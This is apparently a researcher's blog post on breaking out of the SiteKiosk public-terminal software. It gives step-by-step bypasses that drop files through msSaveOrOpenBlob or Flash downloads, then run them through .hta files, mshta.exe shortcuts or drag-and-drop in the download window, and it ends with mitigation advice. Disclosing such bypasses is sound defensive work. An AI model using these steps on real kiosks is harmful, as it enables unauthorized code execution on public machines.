SiteKiosk - BreakoutIt has been a while since my last blog post, therefore I am going to share two possible bypasses for the software SiteKiosk on Windows. As the name suggests, it is a kiosk software ^^.
SiteKiosk is a software from Provision GmbH. It claims to have more than 250.000 installations world wide, which would make it to one of the most used software in the "Public Access Terminal Software" category.
It has a lot of features, but my only goal was to break out of the sandbox and start an external application.
In the end my findings produced a new beef modules.
Meet the enemy
Provision GmbH offers a trial version, which has nearly all features enabled. The only restriction is that it will sometimes annoy you with a 30 second timeout.
It uses IE as a rendering engine and has support for flash + PDF. So there is a lot to play with ;)
|SiteKiosk greeting message|
The BypassesStep one: Get a file on the file system
Step two: Execute it!
Getting a file on the system
After some tests it turned out that SiteKiosk is pretty good at blocking any dialogs which are triggered by changing the location. It also blocks all of the handlers I tested like "its:" and "file:". Additionally it checks iframes too and blocks any dialogs.
The function I am talking about is window.navigator.msSaveOrOpenBlob.
The first parameter is a blob, which represents the data. The second parameter is the file name
bb = new MSBlobBuilder();
Click Download and the first step is done.
Next step, find a place to save the file and execute it.
If you are lazy, you can trigger a download of a .hta file. HTA files are html applications, which are rendered by mshta.exe. Yes, by default it is not blocked. HTA are html files with all the power, which means they can execute any ActiveX Object. Additionally it does not matter where you save them, because they are interpreted by mshta.exe and not executed in the location they are saved (in contrast to .exe).
Another problem is that you can't do a double click in a download window, so you can't download a .exe, reopen the download window and double click it. But there is a way around this problem too.
To execute a .exe via a flash download do the following:
- Trigger the download via flash. Save the exe in any location.
- Trigger the download again. Rename the previously downloaded exe so that it will not be overwritten by the second download. So you end up with two executables in the same location.
- Open the download window a last time. But instead of specifying a location to save, you drag the icon of one executable into the other one. This will start the program and the other one is treated as an argument. It is like dragging a file into notepad.exe to open it.
- Create on your local pc a lnk (a shortcut file), which points to "C:\windows\system32\mshta.exe". Trigger the download of this file via flash.
- Trigger the download of your hta script file. Save it in the same location as the previous downloaded file.
- Open the download window. Now you drag your .hta script file into the mshta.exe.lnk file. This will pass the file to the real mshta.exe, which is then executed.
First you need to block all possible script applications like mshta. This can be done with the System Security Assistent.
Second you need to lock down all location where it is possible to store and execute files. An example is C:\users\public\downloads.